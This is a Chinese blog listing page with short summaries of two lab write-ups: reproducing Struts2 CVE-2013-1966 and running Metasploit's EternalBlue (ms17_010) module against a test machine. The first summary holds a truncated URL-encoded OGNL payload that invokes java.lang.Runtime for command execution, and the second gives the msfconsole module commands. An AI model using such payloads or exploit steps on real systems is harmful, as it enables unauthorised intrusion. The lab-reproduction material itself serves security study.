2023年3月8日

struts2-cve_2013_1966(漏洞复现)

摘要: 进入复现环境 如下 点击"s:a" tag 发现url出现变化 执行payload ?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRunti 阅读全文

posted @ 2023-03-08 20:09 慕恒HK 阅读(92) 评论(0) 推荐(0) 编辑

2022年7月5日

Metasploit(msf)利用ms17_010(永恒之蓝)出现Encoding::UndefinedConversionError问题

摘要: Metasploit利用ms17_010(永恒之蓝) 利用流程 先确保目标靶机和kali处于同一网段,可以互相Ping通 目标靶机防火墙关闭,开启了445端口 输入search ms17_010 搜索永恒之蓝漏洞 use exploit/windows/smb/ms17_010_eternalblu 阅读全文

posted @ 2022-07-05 22:13 慕恒HK 阅读(513) 评论(0) 推荐(1) 编辑

Copyright © 2024 慕恒HK
Powered by .NET 8.0 on Kubernetes